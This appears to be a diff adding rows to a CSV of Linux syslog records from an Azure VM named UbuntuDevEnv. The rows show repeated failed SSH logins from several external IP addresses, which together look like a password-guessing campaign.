+9251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:41,UbuntuDevEnv,2019-06-25 22:31:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:42,UbuntuDevEnv,2019-06-25 22:31:42,auth,UbuntuDevEnv,info,Failed password for invalid user training from 152.250.252.179 port 46980 ssh2,46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,152.250.252.1,46980,,
+9253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:43,UbuntuDevEnv,2019-06-25 22:31:42,auth,UbuntuDevEnv,info,Disconnected from invalid user training 152.250.252.179 port 46980 [preauth],46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,152.250.252.1,46980,,
+9254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:31:43,UbuntuDevEnv,2019-06-25 22:31:42,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 46980:11: Bye Bye [preauth],46165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,46980,,
+9255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:17,UbuntuDevEnv,2019-06-25 22:32:16,auth,UbuntuDevEnv,info,Invalid user emil from 139.199.113.140 port 52944,46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,139.199.113.1,52944,,
+9256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:17,UbuntuDevEnv,2019-06-25 22:32:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:17,UbuntuDevEnv,2019-06-25 22:32:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:19,UbuntuDevEnv,2019-06-25 22:32:18,auth,UbuntuDevEnv,info,Failed password for invalid user emil from 139.199.113.140 port 52944 ssh2,46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,139.199.113.1,52944,,
+9259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:19,UbuntuDevEnv,2019-06-25 22:32:18,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 52944:11: Bye Bye [preauth],46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,52944,,
+9260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:19,UbuntuDevEnv,2019-06-25 22:32:18,auth,UbuntuDevEnv,info,Disconnected from invalid user emil 139.199.113.140 port 52944 [preauth],46290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,139.199.113.1,52944,,
+9261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:21,UbuntuDevEnv,2019-06-25 22:32:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87  user=test,46317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,77.232.128.8,,0,
+9262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:23,UbuntuDevEnv,2019-06-25 22:32:23,auth,UbuntuDevEnv,info,Failed password for test from 77.232.128.87 port 40071 ssh2,46317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,40071,,
+9263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:24,UbuntuDevEnv,2019-06-25 22:32:23,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 40071:11: Bye Bye [preauth],46317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,40071,,
+9264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:24,UbuntuDevEnv,2019-06-25 22:32:23,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 77.232.128.87 port 40071 [preauth],46317,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,77.232.128.8,40071,,
+9265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:26,UbuntuDevEnv,2019-06-25 22:32:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:26,UbuntuDevEnv,2019-06-25 22:32:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:26,UbuntuDevEnv,2019-06-25 22:32:25,auth,UbuntuDevEnv,info,Invalid user webmaster from 212.156.136.114 port 63443,46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,212.156.136.1,63443,,
+9268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:28,UbuntuDevEnv,2019-06-25 22:32:27,auth,UbuntuDevEnv,info,Failed password for invalid user webmaster from 212.156.136.114 port 63443 ssh2,46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,212.156.136.1,63443,,
+9269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:28,UbuntuDevEnv,2019-06-25 22:32:27,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 63443:11: Bye Bye [preauth],46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,63443,,
+9270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:28,UbuntuDevEnv,2019-06-25 22:32:27,auth,UbuntuDevEnv,info,Disconnected from invalid user webmaster 212.156.136.114 port 63443 [preauth],46332,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,212.156.136.1,63443,,
+9271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:45,UbuntuDevEnv,2019-06-25 22:32:45,auth,UbuntuDevEnv,info,Invalid user partha from 178.62.54.79 port 53190,46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,178.62.54.7,53190,,
+9272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:45,UbuntuDevEnv,2019-06-25 22:32:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:45,UbuntuDevEnv,2019-06-25 22:32:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:47,UbuntuDevEnv,2019-06-25 22:32:47,auth,UbuntuDevEnv,info,Failed password for invalid user partha from 178.62.54.79 port 53190 ssh2,46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,178.62.54.7,53190,,
+9275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:47,UbuntuDevEnv,2019-06-25 22:32:47,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 53190:11: Bye Bye [preauth],46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,53190,,
+9276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:32:47,UbuntuDevEnv,2019-06-25 22:32:47,auth,UbuntuDevEnv,info,Disconnected from invalid user partha 178.62.54.79 port 53190 [preauth],46403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,178.62.54.7,53190,,
+9277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:33,UbuntuDevEnv,2019-06-25 22:33:32,auth,UbuntuDevEnv,info,Invalid user bruno from 152.250.252.179 port 35416,46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bruno,152.250.252.1,35416,,
+9278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:33,UbuntuDevEnv,2019-06-25 22:33:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:33,UbuntuDevEnv,2019-06-25 22:33:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:34,UbuntuDevEnv,2019-06-25 22:33:34,auth,UbuntuDevEnv,info,Failed password for invalid user bruno from 152.250.252.179 port 35416 ssh2,46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bruno,152.250.252.1,35416,,
+9281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:34,UbuntuDevEnv,2019-06-25 22:33:34,auth,UbuntuDevEnv,info,Disconnected from invalid user bruno 152.250.252.179 port 35416 [preauth],46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bruno,152.250.252.1,35416,,
+9282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:34,UbuntuDevEnv,2019-06-25 22:33:34,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 35416:11: Bye Bye [preauth],46562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,35416,,
+9283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:44,UbuntuDevEnv,2019-06-25 22:33:44,auth,UbuntuDevEnv,info,Invalid user pamela from 139.199.113.140 port 39118,46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,139.199.113.1,39118,,
+9284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:44,UbuntuDevEnv,2019-06-25 22:33:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:44,UbuntuDevEnv,2019-06-25 22:33:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:46,UbuntuDevEnv,2019-06-25 22:33:45,auth,UbuntuDevEnv,info,Failed password for invalid user pamela from 139.199.113.140 port 39118 ssh2,46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,139.199.113.1,39118,,
+9287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:46,UbuntuDevEnv,2019-06-25 22:33:45,auth,UbuntuDevEnv,info,Disconnected from invalid user pamela 139.199.113.140 port 39118 [preauth],46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,139.199.113.1,39118,,
+9288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:46,UbuntuDevEnv,2019-06-25 22:33:45,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 39118:11: Bye Bye [preauth],46606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,39118,,
+9289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:47,UbuntuDevEnv,2019-06-25 22:33:47,auth,UbuntuDevEnv,info,Invalid user adrian from 59.100.246.170 port 33575,46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adrian,59.100.246.1,33575,,
+9290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:47,UbuntuDevEnv,2019-06-25 22:33:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:47,UbuntuDevEnv,2019-06-25 22:33:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:50,UbuntuDevEnv,2019-06-25 22:33:49,auth,UbuntuDevEnv,info,Failed password for invalid user adrian from 59.100.246.170 port 33575 ssh2,46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adrian,59.100.246.1,33575,,
+9293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:50,UbuntuDevEnv,2019-06-25 22:33:50,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 33575:11: Bye Bye [preauth],46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,33575,,
+9294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:50,UbuntuDevEnv,2019-06-25 22:33:50,auth,UbuntuDevEnv,info,Disconnected from invalid user adrian 59.100.246.170 port 33575 [preauth],46614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adrian,59.100.246.1,33575,,
+9295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:56,UbuntuDevEnv,2019-06-25 22:33:55,auth,UbuntuDevEnv,info,Invalid user ahmed from 77.232.128.87 port 48597,46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ahmed,77.232.128.8,48597,,
+9296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:56,UbuntuDevEnv,2019-06-25 22:33:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:56,UbuntuDevEnv,2019-06-25 22:33:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:57,UbuntuDevEnv,2019-06-25 22:33:56,auth,UbuntuDevEnv,info,Invalid user raoul from 212.156.136.114 port 22355,46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raoul,212.156.136.1,22355,,
+9299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:57,UbuntuDevEnv,2019-06-25 22:33:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:57,UbuntuDevEnv,2019-06-25 22:33:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:58,UbuntuDevEnv,2019-06-25 22:33:57,auth,UbuntuDevEnv,info,Failed password for invalid user ahmed from 77.232.128.87 port 48597 ssh2,46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ahmed,77.232.128.8,48597,,
+9302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:58,UbuntuDevEnv,2019-06-25 22:33:57,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 48597:11: Bye Bye [preauth],46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,48597,,
+9303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:58,UbuntuDevEnv,2019-06-25 22:33:57,auth,UbuntuDevEnv,info,Disconnected from invalid user ahmed 77.232.128.87 port 48597 [preauth],46650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ahmed,77.232.128.8,48597,,
+9304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:59,UbuntuDevEnv,2019-06-25 22:33:59,auth,UbuntuDevEnv,info,Failed password for invalid user raoul from 212.156.136.114 port 22355 ssh2,46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raoul,212.156.136.1,22355,,
+9305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:59,UbuntuDevEnv,2019-06-25 22:33:59,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 22355:11: Bye Bye [preauth],46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,22355,,
+9306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:33:59,UbuntuDevEnv,2019-06-25 22:33:59,auth,UbuntuDevEnv,info,Disconnected from invalid user raoul 212.156.136.114 port 22355 [preauth],46658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raoul,212.156.136.1,22355,,
+9307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:11,UbuntuDevEnv,2019-06-25 22:34:11,auth,UbuntuDevEnv,info,Invalid user avahi-autoipd from 178.62.54.79 port 41334,46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,178.62.54.7,41334,,
+9308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:11,UbuntuDevEnv,2019-06-25 22:34:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:11,UbuntuDevEnv,2019-06-25 22:34:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:34:13,UbuntuDevEnv,2019-06-25 22:34:13,auth,UbuntuDevEnv,info,Failed password for invalid user avahi-autoipd from 178.62.54.79 port 41334 ssh2,46713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,178.62.54.7,41334,,
